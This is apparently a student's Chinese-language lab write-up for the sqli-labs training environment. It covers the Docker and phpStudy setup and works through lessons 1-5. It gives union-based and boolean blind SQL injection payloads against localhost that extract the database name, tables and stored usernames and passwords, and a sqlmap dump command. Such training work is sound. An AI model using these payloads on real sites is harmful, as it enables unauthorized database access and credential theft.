大四_17周实训

博主： dayi
发布时间：2024 年 12 月 24 日
43 次浏览
暂无评论
12534字数
分类：默认分类

大四_17周实训

环境安装_windows

Windows 虚拟机 WIN10_LTSC

phpstudy 2016

安装比较老的php（不能大于7不然无法安装）

http://public.xp.cn/upgrades/phpStudy20161103.zip

能打开就行；

复制环境

https://github.com/Audi-1/sqli-labs

下一个zip

复制到这里：

粘贴到这里

改名为：sqli

填个密码：（默认密码是root）

访问：

等一会就行

这样就行：

环境安装_Linux

git clone https://github.com/Audi-1/sqli-labs
docker-compose up

#访问81端口即可

docker-compose.yaml

version: '3'
services:
  nginx:
    image: nginx:latest
    ports:
      - "81:80"
    volumes:
      - ./sqli-labs:/var/www/html/sqli
      - ./nginx.conf:/etc/nginx/conf.d/default.conf
    depends_on:
      - php

  php:
    build: .
    volumes:
      - ./sqli-labs:/var/www/html/sqli

  mysql:
    image: mysql:5.7
    environment:
      MYSQL_ROOT_PASSWORD: 123456
    volumes:
      - ./mysql_data:/var/lib/mysql

Dockerfile

FROM php:5.6-fpm-alpine
RUN apk add --no-cache mysql-client
RUN docker-php-ext-install mysql mysqli pdo pdo_mysql

nginx.conf

server {
    listen 80;
    server_name localhost;
    root /var/www/html;
    index index.php index.html;

    location ~ \.php$ {
        fastcgi_pass php:9000;
        fastcgi_index index.php;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        include fastcgi_params;
    }
}

修改下配置文件

db-creds.inc

修改数据库连接配置

sql-connections/db-creds.inc

<?php

//give your mysql connection username n password
$dbuser ='root';
$dbpass ='toor';
$dbname ="security";
$host = 'mysql';
$dbname1 = "challenges";


?>

启动

端口转发即可

docker-compose up

如图所示

要求：任务1

http://127.0.0.1/sqli/Less-2/?id=1’ 
报错
http://127.0.0.1/sqli/Less-2/?id=1 and 1=1 正常
http://127.0.0.1/sqli/Less-2/?id=1 and 1=11不正常
确定为数值型，存在注入。
http://127.0.0.1/sqli/Less-2/?id=1 order by 10 不正常
http://127.0.0.1/sqli/Less-2/?id=1 order by 4 不正常
http://127.0.0.1/sqli/Less-2/?id=1 order by 3 正常
确定3列
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,3
确定显示位2，3
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,database()
结果security ，确定了数据库名
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security" 
结果：emails,referers,uagents,users，确定了4个表名
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"
结果：id,username,password  一共3个列
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(username,0x7e,password) from users
爆出所有账号密码

要求：任务2

SELECT * FROM users WHERE id='$id' LIMIT 0,1
id=1'--+
SELECT * FROM users WHERE id='1'
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(username,0x7e,password) from users--+
http://127.0.0.1/sqli/Less-3/?id=1')--+
http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,2,group_concat(username,0x7e,password) from users--+
http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2,group_concat(username,0x7e,password) from users--+

http://127.0.0.1/sqli/Less-5/?id=1' and length(database)=9--+错误
http://127.0.0.1/sqli/Less-5/?id=1' and length(database)=8--+正确
结论：数据库名字长度是8
http://127.0.0.1/sqli/Less-5/?id=1' and (select substr(database(),1,1))="s"--+正确
http://127.0.0.1/sqli/Less-5/?id=1' and (select substr(database(),1,1))="d"--+不正确
结论：数据库名字第一个字母是s
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr(database(),1,1))>114--+正确
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr(database(),1,1))>115--+错误
结论：ascii对应115，115对应s
101--e  99--c  117--u  
爆表、列、值

进入网页，进行初始化

初始化；

实验任务1 - LESS2

1. 首先测试是否存在SQL注入漏洞：

http://127.0.0.1/sqli/Less-2/?id=1’

报错

添加单引号后页面报错，说明存在潜在注入点。

2. 进一步通过and语句判断注入类型：

http://127.0.0.1/sqli/Less-2/?id=1 and 1=1 正常

继续尝试，提供错误表达式

http://127.0.0.1/sqli/Less-2/?id=1 and 1=11不正常

3. 根据测试结果可以确定这是一个数值型注入。

确定为数值型，存在注入。

4. 尝试数据库获得字段数

http://127.0.0.1/sqli/Less-2/?id=1 order by 10 不正常

继续尝试

http://127.0.0.1/sqli/Less-2/?id=1 order by 4 不正常

继续尝试

http://127.0.0.1/sqli/Less-2/?id=1 order by 3 正常

确定查询结果包含3个字段。

5. 确定显示位置

使用UNION SELECT语句确定显示位：

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,3

如图，确定显示位2，3

6. 确定数据库名

这样有显示了，就可以把数据库名字拿出来。

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,database()

结果security ，确定了数据库名

7. 然后尝试把列名拿出来

id=-1 union select 1,2,group_concat(table_name) 
from information_schema.tables 
where table_schema="security"

payload:

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security"

结果：emails,referers,uagents,users。

8. 再拿字段名字

id=-1 union select 1,2,group_concat(column_name) 
from information_schema.columns 
where table_schema="security" 
and table_name="users"

payload:

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"

结果：id,username,password 一共3个列

9. 数据获取

最后获取用户表中的敏感信息：

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(username,0x7e,password) from users
爆出所有账号密码

实验任务2

SELECT * FROM users WHERE id='$id' LIMIT 0,1
id=1'--+
SELECT * FROM users WHERE id='1'


http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(username,0x7e,password) from users--+




http://127.0.0.1/sqli/Less-3/?id=1')--+
http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,2,group_concat(username,0x7e,password) from users--+
http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2,group_concat(username,0x7e,password) from users--+

http://127.0.0.1/sqli/Less-5/?id=1' and length(database)=9--+错误
http://127.0.0.1/sqli/Less-5/?id=1' and length(database)=8--+正确
结论：数据库名字长度是8
http://127.0.0.1/sqli/Less-5/?id=1' and (select substr(database(),1,1))="s"--+正确
http://127.0.0.1/sqli/Less-5/?id=1' and (select substr(database(),1,1))="d"--+不正确
结论：数据库名字第一个字母是s
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr(database(),1,1))>114--+正确
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr(database(),1,1))>115--+错误
结论：ascii对应115，115对应s
101--e  99--c  117--u  
爆表、列、值

Less-1: 字符型注入(')

http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(username,0x7e,password) from users--+

需要闭合单引号,使用union select直接注入。

结果: 成功获取用户名和密码数据

Dumb~Dumb, Angelina~I-kill-you, Dummy~p@ssword, secure~crappy, stupid~stupidity, superman~genious, batman~mob!le, admin~admin, admin1~admin1, admin2~admin2, admin3~admin3, admin4~admin4

Less-3: 字符型注入(')

需要闭合单引号和括号

1. 测试注入点

http://127.0.0.1/sqli/Less-3/?id=1')--+

结果：页面正常显示,确认闭合方式正确

2.构造完整payload获取数据

http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,2,group_concat(username,0x7e,password) from users--+

结果: 同Less-1,成功获取所有用户数据

Less-4: 字符型注入(")

需要闭合双引号和括号

http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2,group_concat(username,0x7e,password) from users--+

结果: 同样成功获取用户数据

Less-5: 布尔盲注

通过布尔盲注逐步获取信息

http://127.0.0.1/sqli/Less-5/?id=1' and length(database)=9--+错误

1.判断数据库名长度

http://127.0.0.1/sqli/Less-5/?id=1' and length(database())=9--+

结果: 错误,页面无正常显示

http://127.0.0.1/sqli/Less-5/?id=1' and length(database)=8--+正确

结果: 正确,页面正常显示
结论: 数据库名长度为8个字符

2.逐字符判断数据库名

http://127.0.0.1/sqli/Less-5/?id=1' and (select substr(database(),1,1))="s"--+正确

结果: 正确,页面正常显示

http://127.0.0.1/sqli/Less-5/?id=1' and (select substr(database(),1,1))="d"--+不正确

结果: 错误,页面无正常显示
结论: 数据库名第一个字符为's'

结论：数据库名字第一个字母是s

3.使用ASCII码进一步确认

http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr(database(),1,1))>114--+正确

结果: 正确

http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr(database(),1,1))>115--+错误

结果: 错误
结论: 第一个字符ASCII码为115,对应字母's'

4.常用ASCII码对照表

s: 115

e: 101

c: 99

u: 117

5.剩下的工作比较重复，直接使用工具即可

但是是没有灵魂的。

爆表、列、值，直接用工具啦。

爆库：

获得库：

爆表

6. 没有灵魂，直接DUMP出来

H:\awd\ONE-FOX集成工具箱_V6公开版_by狐狸\ONE-FOX集成工具箱_V6公开版_by狐狸\gui_scan\sqlmap> python sqlmap.py -u http://127.0.0.1/sqli/Less-5/?id=1 -D security --dump

OK，试验结束。

最后修改：2024 年 12 月 25 日

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

ujurpoeqve
真棒！
gvqxchgycg
博主太厉害了！
王大仙
嘿嘿嘿
球
该评论仅登录用户及评论双方可见
dayi的小迷妹
0x344 如果你创建目录后找不到“软件包”，需要标记下。参考...

大四_17周实训

dayi • 2024 年 12 月 24 日

<h1>大四_17周实训</h1><h2>环境安装_windows</h2><p>Windows 虚拟机 <code>WIN10_LTSC</code></p><p><img src="https://cmd.dayi.ink/uploads/upload_d18126722535a52999085a14d1462e71.png" alt="" title=""style=""></p><p><img src="https://cmd.dayi.ink/uploads/upload_756cf6435831f8c8ff04121de2af742a.png" alt="" title=""style=""></p><p><img src="https://cmd.dayi.ink/uploads/upload_1c2403061aad2f042008c201a21a5ab9.png" alt="" title=""style=""></p><h3>phpstudy 2016</h3><p>安装比较老的php（不能大于7不然无法安装）</p><p><span class="external-link"><a class="no-external-link" href="http://public.xp.cn/upgrades/phpStudy20161103.zip" target="_blank"><i data-feather="external-link"></i>http://public.xp.cn/upgrades/phpStudy20161103.zip</a></span></p><p><img src="https://cmd.dayi.ink/uploads/upload_68ef39a10dc9fbb319d7e4ab94190b5b.png" alt="" title=""style=""></p><p>能打开就行；</p><p><img src="https://cmd.dayi.ink/uploads/upload_35c2887dd40e66e53559ba0b2322580c.png" alt="" title=""style=""></p><h3>复制环境</h3><p><span class="external-link"><a class="no-external-link" href="https://github.com/Audi-1/sqli-labs" target="_blank"><i data-feather="external-link"></i>https://github.com/Audi-1/sqli-labs</a></span></p><p>下一个zip</p><p><img src="https://cmd.dayi.ink/uploads/upload_adf441392c1e824796a55c00c2c221fc.png" alt="" title=""style=""></p><p>复制到这里：</p><p><img src="https://cmd.dayi.ink/uploads/upload_a3e6364408d6687687a66a988861ac11.png" alt="" title=""style=""></p><p>粘贴到这里</p><p><img src="https://cmd.dayi.ink/uploads/upload_1c40e5c7ac9a39dad7711d053c4f1f94.png" alt="" title=""style=""></p><p>改名为：sqli</p><p><img src="https://cmd.dayi.ink/uploads/upload_1e81182169409ca17c0f022b141cacf1.png" alt="" title=""style=""></p><p>填个密码：<strong>（默认密码是root）</strong></p><p><img src="https://cmd.dayi.ink/uploads/upload_bf47008763eed0747770870fc725ff97.png" alt="" title=""style=""></p><p>访问：</p><p><img src="https://cmd.dayi.ink/uploads/upload_a3194f9516e13cdad5dffcef57addf26.png" alt="" title=""style=""></p><p>等一会就行</p><p><img src="https://cmd.dayi.ink/uploads/upload_65791edebb4e34e7ecc150cd66b4f265.png" alt="" title=""style=""></p><p>这样就行：<br><img src="https://cmd.dayi.ink/uploads/upload_92aa381b8cf1bd167906b216083f23eb.png" alt="" title=""style=""></p><h2>环境安装_Linux</h2><pre><code class="lang-bash">git clone https://github.com/Audi-1/sqli-labs
docker-compose up

#访问81端口即可</code></pre><h3>docker-compose.yaml</h3><pre><code class="lang-yaml">version: '3'
services:
  nginx:
    image: nginx:latest
    ports:
      - &quot;81:80&quot;
    volumes:
      - ./sqli-labs:/var/www/html/sqli
      - ./nginx.conf:/etc/nginx/conf.d/default.conf
    depends_on:
      - php

php:
    build: .
    volumes:
      - ./sqli-labs:/var/www/html/sqli

mysql:
    image: mysql:5.7
    environment:
      MYSQL_ROOT_PASSWORD: 123456
    volumes:
      - ./mysql_data:/var/lib/mysql</code></pre><h3>Dockerfile</h3><pre><code class="lang-bash">FROM php:5.6-fpm-alpine
RUN apk add --no-cache mysql-client
RUN docker-php-ext-install mysql mysqli pdo pdo_mysql</code></pre><h3>nginx.conf</h3><pre><code class="lang-bash">server {
    listen 80;
    server_name localhost;
    root /var/www/html;
    index index.php index.html;

location ~ \.php$ {
        fastcgi_pass php:9000;
        fastcgi_index index.php;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        include fastcgi_params;
    }
}</code></pre><h3>修改下配置文件</h3><p><img src="https://cmd.dayi.ink/uploads/upload_1de5bbf98eb719dac0fb1921d87d5026.png" alt="" title=""style=""></p><h4>db-creds.inc</h4><p>修改数据库连接配置</p><p>sql-connections/db-creds.inc</p><p><img src="https://cmd.dayi.ink/uploads/upload_03c0d0ee935949d946ae14acdf1a8cb1.png" alt="" title=""style=""></p><pre><code class="lang-php">&lt;?php

//give your mysql connection username n password
$dbuser ='root';
$dbpass ='toor';
$dbname =&quot;security&quot;;
$host = 'mysql';
$dbname1 = &quot;challenges&quot;;

?&gt;
</code></pre><p><img src="https://cmd.dayi.ink/uploads/upload_c50eaaeae4c9c394222340572058efb3.png" alt="" title=""style=""></p><h3>启动</h3><p>端口转发即可</p><pre><code class="lang-bash">docker-compose up</code></pre><p><img src="https://cmd.dayi.ink/uploads/upload_0f1fb639b4aa3f4375d05e1261712373.png" alt="" title=""style=""></p><p>如图所示</p><p><img src="https://cmd.dayi.ink/uploads/upload_7d75e31c923a691e95d07833808ea558.png" alt="" title=""style=""></p><h2>要求：任务1</h2><pre><code class="lang-bash">http://127.0.0.1/sqli/Less-2/?id=1’ 
报错
http://127.0.0.1/sqli/Less-2/?id=1 and 1=1 正常
http://127.0.0.1/sqli/Less-2/?id=1 and 1=11不正常
确定为数值型，存在注入。
http://127.0.0.1/sqli/Less-2/?id=1 order by 10 不正常
http://127.0.0.1/sqli/Less-2/?id=1 order by 4 不正常
http://127.0.0.1/sqli/Less-2/?id=1 order by 3 正常
确定3列
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,3
确定显示位2，3
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,database()
结果security ，确定了数据库名
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&quot;security&quot; 
结果：emails,referers,uagents,users，确定了4个表名
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=&quot;security&quot; and table_name=&quot;users&quot;
结果：id,username,password  一共3个列
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(username,0x7e,password) from users
爆出所有账号密码</code></pre><h2>要求：任务2</h2><pre><code class="lang-bash">SELECT * FROM users WHERE id='$id' LIMIT 0,1
id=1'--+
SELECT * FROM users WHERE id='1'
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(username,0x7e,password) from users--+
http://127.0.0.1/sqli/Less-3/?id=1')--+
http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,2,group_concat(username,0x7e,password) from users--+
http://127.0.0.1/sqli/Less-4/?id=-1&quot;) union select 1,2,group_concat(username,0x7e,password) from users--+

</code></pre><h2>进入网页，进行初始化</h2><p><img src="https://cmd.dayi.ink/uploads/upload_eeed27ee729f09dc6288015593119441.png" alt="" title=""style=""></p><p>初始化；</p><p><img src="https://cmd.dayi.ink/uploads/upload_75daa2d0c8fb2c7c30b473d4fb370cd6.png" alt="" title=""style=""></p><h2>实验任务1 - LESS2</h2><h3>1. 首先测试是否存在SQL注入漏洞：</h3><pre><code class="lang-bash">http://127.0.0.1/sqli/Less-2/?id=1’ </code></pre><p>报错</p><p><img src="https://cmd.dayi.ink/uploads/upload_ff047baf17a6d0d7e5a17849719b3895.png" alt="" title=""style=""></p><p>添加单引号后页面报错，说明存在潜在注入点。</p><h3>2. 进一步通过and语句判断注入类型：</h3><pre><code class="lang-bash">http://127.0.0.1/sqli/Less-2/?id=1 and 1=1 正常</code></pre><p><img src="https://cmd.dayi.ink/uploads/upload_8a39fc84420e9242ed57dac3a4d9bcca.png" alt="" title=""style=""></p><p>继续尝试，提供错误表达式</p><pre><code class="lang-bash">http://127.0.0.1/sqli/Less-2/?id=1 and 1=11不正常</code></pre><h3>3. 根据测试结果可以确定这是一个数值型注入。</h3><p>确定为数值型，存在注入。</p><p><img src="https://cmd.dayi.ink/uploads/upload_f1863c050ddd4e322980339f3944fedd.png" alt="" title=""style=""></p><h3>4. 尝试数据库获得字段数</h3><pre><code class="lang-bash">http://127.0.0.1/sqli/Less-2/?id=1 order by 10 不正常</code></pre><p><img src="https://cmd.dayi.ink/uploads/upload_cd40b4e376a0abe0df2bf99415b41648.png" alt="" title=""style=""></p><p>继续尝试</p><pre><code class="lang-bash">http://127.0.0.1/sqli/Less-2/?id=1 order by 4 不正常</code></pre><p><img src="https://cmd.dayi.ink/uploads/upload_326a31bc529955b10a01be40ad943bbb.png" alt="" title=""style=""></p><p>继续尝试</p><pre><code class="lang-bash">http://127.0.0.1/sqli/Less-2/?id=1 order by 3 正常</code></pre><p>确定查询结果包含3个字段。</p><p><img src="https://cmd.dayi.ink/uploads/upload_4103e5cbd9bdeb2fc3d79a1bf08d332c.png" alt="" title=""style=""></p><h3>5. 确定显示位置</h3><p>使用UNION SELECT语句确定显示位：</p><pre><code class="lang-bash">http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,3</code></pre><p>如图，确定显示位2，3</p><p><img src="https://cmd.dayi.ink/uploads/upload_724b2c55e1b303cfd80fd53b282ce63e.png" alt="" title=""style=""></p><h3>6. 确定数据库名</h3><p>这样有显示了，就可以把数据库名字拿出来。</p><pre><code class="lang-bash">http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,database()</code></pre><p>结果security ，确定了数据库名</p><p><img src="https://cmd.dayi.ink/uploads/upload_db6bd4fc9973f361f925ac06adc13f0e.png" alt="" title=""style=""></p><h3>7. 然后尝试把列名拿出来</h3><pre><code class="lang-sql">id=-1 union select 1,2,group_concat(table_name) 
from information_schema.tables 
where table_schema=&quot;security&quot;</code></pre><p>payload:</p><pre><code class="lang-bash">http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&quot;security&quot; </code></pre><p>结果：emails,referers,uagents,users。</p><p><img src="https://cmd.dayi.ink/uploads/upload_8a5c8f87e7a46f6b9d2c4e90a2495354.png" alt="" title=""style=""></p><h3>8. 再拿字段名字</h3><pre><code class="lang-sql">id=-1 union select 1,2,group_concat(column_name) 
from information_schema.columns 
where table_schema=&quot;security&quot; 
and table_name=&quot;users&quot;</code></pre><p>payload:</p><pre><code class="lang-bash">http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=&quot;security&quot; and table_name=&quot;users&quot;</code></pre><p><img src="https://cmd.dayi.ink/uploads/upload_15fd678f1ded19f6999234db36a43095.png" alt="" title=""style=""></p><p>结果：<code>id,username,password</code>  一共3个列</p><h3>9. 数据获取</h3><p>最后获取用户表中的敏感信息：</p><pre><code class="lang-bash">http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(username,0x7e,password) from users
爆出所有账号密码</code></pre><p><img src="https://cmd.dayi.ink/uploads/upload_1cd8e831edae0f3e0debd2275a06e9a8.png" alt="" title=""style=""></p><h2>实验任务2</h2><pre><code class="lang-bash">SELECT * FROM users WHERE id='$id' LIMIT 0,1
id=1'--+
SELECT * FROM users WHERE id='1'

http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(username,0x7e,password) from users--+

http://127.0.0.1/sqli/Less-3/?id=1')--+
http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,2,group_concat(username,0x7e,password) from users--+
http://127.0.0.1/sqli/Less-4/?id=-1&quot;) union select 1,2,group_concat(username,0x7e,password) from users--+

http://127.0.0.1/sqli/Less-5/?id=1' and length(database)=9--+错误
http://127.0.0.1/sqli/Less-5/?id=1' and length(database)=8--+正确
结论：数据库名字长度是8
http://127.0.0.1/sqli/Less-5/?id=1' and (select substr(database(),1,1))=&quot;s&quot;--+正确
http://127.0.0.1/sqli/Less-5/?id=1' and (select substr(database(),1,1))=&quot;d&quot;--+不正确
结论：数据库名字第一个字母是s
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr(database(),1,1))&gt;114--+正确
http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr(database(),1,1))&gt;115--+错误
结论：ascii对应115，115对应s
101--e  99--c  117--u  
爆表、列、值</code></pre><h3>Less-1: 字符型注入(')</h3><pre><code class="lang-bash">http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(username,0x7e,password) from users--+</code></pre><p>需要闭合单引号,使用union select直接注入。</p><p><img src="https://cmd.dayi.ink/uploads/upload_e739f2a6de356c5f2193d793c80d3f88.png" alt="" title=""style=""></p><p><strong>结果: 成功获取用户名和密码数据</strong></p><p><code>Dumb~Dumb, Angelina~I-kill-you, Dummy~p@ssword, secure~crappy, stupid~stupidity, superman~genious, batman~mob!le, admin~admin, admin1~admin1, admin2~admin2, admin3~admin3, admin4~admin4</code></p><p><img src="https://cmd.dayi.ink/uploads/upload_e739f2a6de356c5f2193d793c80d3f88.png" alt="" title=""style=""></p><h3>Less-3: 字符型注入(')</h3><p>需要闭合单引号和括号</p><h4>1. 测试注入点</h4><pre><code class="lang-bash">http://127.0.0.1/sqli/Less-3/?id=1')--+</code></pre><p><img src="https://cmd.dayi.ink/uploads/upload_bbabfcea88d954877e52454a89cd5bad.png" alt="" title=""style=""></p><p>结果：页面正常显示,确认闭合方式正确</p><h4>2.构造完整payload获取数据</h4><pre><code class="lang-bash">http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,2,group_concat(username,0x7e,password) from users--+</code></pre><p><img src="https://cmd.dayi.ink/uploads/upload_6789ccfadc49f6d887bdf3946193760a.png" alt="" title=""style=""></p><p>结果: 同Less-1,成功获取所有用户数据</p><h3>Less-4: 字符型注入(")</h3><p>需要闭合双引号和括号</p><pre><code class="lang-bash">http://127.0.0.1/sqli/Less-4/?id=-1&quot;) union select 1,2,group_concat(username,0x7e,password) from users--+</code></pre><p>结果: 同样成功获取用户数据</p><p><img src="https://cmd.dayi.ink/uploads/upload_aeb6cca683f11ca51da709d8a975285b.png" alt="" title=""style=""></p><h3>Less-5: 布尔盲注</h3><p>通过布尔盲注逐步获取信息</p><pre><code class="lang-bash">http://127.0.0.1/sqli/Less-5/?id=1' and length(database)=9--+错误</code></pre><p><img src="https://cmd.dayi.ink/uploads/upload_f2b8fb5bcb8e9705a5a5c3087502ab15.png" alt="" title=""style=""></p><h4>1.判断数据库名长度</h4><pre><code class="lang-bash">http://127.0.0.1/sqli/Less-5/?id=1' and length(database())=9--+</code></pre><p>结果: 错误,页面无正常显示</p><pre><code class="lang-bash">http://127.0.0.1/sqli/Less-5/?id=1' and length(database)=8--+正确</code></pre><p><img src="https://cmd.dayi.ink/uploads/upload_fcb6bef67241b0e9a8ccf0107472b779.png" alt="" title=""style=""></p><p>结果: 正确,页面正常显示<br><strong>结论: 数据库名长度为8个字符</strong></p><h4>2.逐字符判断数据库名</h4><pre><code class="lang-bash">http://127.0.0.1/sqli/Less-5/?id=1' and (select substr(database(),1,1))=&quot;s&quot;--+正确</code></pre><p><img src="https://cmd.dayi.ink/uploads/upload_312f7a8b525a290f21dc767ff0a4a3ec.png" alt="" title=""style=""></p><p>结果: 正确,页面正常显示</p><pre><code class="lang-bash">http://127.0.0.1/sqli/Less-5/?id=1' and (select substr(database(),1,1))=&quot;d&quot;--+不正确</code></pre><p>结果: 错误,页面无正常显示<br><strong>结论: 数据库名第一个字符为's'</strong></p><p><img src="https://cmd.dayi.ink/uploads/upload_55bec02ba10bb62136332c4a117c31a6.png" alt="" title=""style=""></p><p>结论：数据库名字第一个字母是s</p><h4>3.使用ASCII码进一步确认</h4><pre><code class="lang-bash">http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr(database(),1,1))&gt;114--+正确</code></pre><p>结果: 正确</p><p><img src="https://cmd.dayi.ink/uploads/upload_289b245553ffd1a81c370ca2bc2a76f2.png" alt="" title=""style=""></p><pre><code class="lang-bash">http://127.0.0.1/sqli/Less-5/?id=1' and ascii(substr(database(),1,1))&gt;115--+错误</code></pre><p><strong>结果: 错误</strong><br><strong>结论: 第一个字符ASCII码为115,对应字母's'</strong></p><h4>4.常用ASCII码对照表</h4><p><strong>s: 115</strong></p><p><strong>e: 101</strong></p><p><strong>c: 99</strong></p><p><strong>u: 117</strong></p><p><img src="https://cmd.dayi.ink/uploads/upload_53d203ad92ad485fda835ade14a5c600.png" alt="" title=""style=""></p><h4>5.剩下的工作比较重复，直接使用工具即可</h4><blockquote>但是是没有灵魂的。</blockquote><p>爆表、列、值，直接用工具啦。</p><p>爆库：</p><p><img src="https://cmd.dayi.ink/uploads/upload_b2bd51899ec3137d007dda2422214b16.png" alt="" title=""style=""></p><p>获得库：</p><p><img src="https://cmd.dayi.ink/uploads/upload_f6294236cffe71608b072c94ab0dca96.png" alt="" title=""style=""></p><p>爆表</p><p><img src="https://cmd.dayi.ink/uploads/upload_42943fb3e35a11fb7137d8569070603e.png" alt="" title=""style=""></p><h4>6. 没有灵魂，直接DUMP出来</h4><pre><code class="lang-bash">H:\awd\ONE-FOX集成工具箱_V6公开版_by狐狸\ONE-FOX集成工具箱_V6公开版_by狐狸\gui_scan\sqlmap&gt; python sqlmap.py -u http://127.0.0.1/sqli/Less-5/?id=1 -D security --dump</code></pre><p><img src="https://cmd.dayi.ink/uploads/upload_0bc40afd901ce31869343eabded3c243.png" alt="" title=""style=""></p><p><img src="https://cmd.dayi.ink/uploads/upload_7cb2ad41792e6ff8a915a8d258698178.png" alt="" title=""style=""></p><p>OK，试验结束。</p>

大四_17周实训

环境安装_windows

phpstudy 2016

复制环境

环境安装_Linux

docker-compose.yaml

Dockerfile

nginx.conf

修改下配置文件

db-creds.inc

启动

要求：任务1

要求：任务2

进入网页，进行初始化

实验任务1 - LESS2

1. 首先测试是否存在SQL注入漏洞：

2. 进一步通过and语句判断注入类型：

3. 根据测试结果可以确定这是一个数值型注入。

4. 尝试数据库获得字段数

5. 确定显示位置

6. 确定数据库名

7. 然后尝试把列名拿出来

8. 再拿字段名字

9. 数据获取

实验任务2

Less-1: 字符型注入(')

Less-3: 字符型注入(')

1. 测试注入点

2.构造完整payload获取数据

Less-4: 字符型注入(")

Less-5: 布尔盲注

1.判断数据库名长度

2.逐字符判断数据库名

3.使用ASCII码进一步确认

4.常用ASCII码对照表

5.剩下的工作比较重复，直接使用工具即可

6. 没有灵魂，直接DUMP出来

发表评论 取消回复 使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

大四_17周实训

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款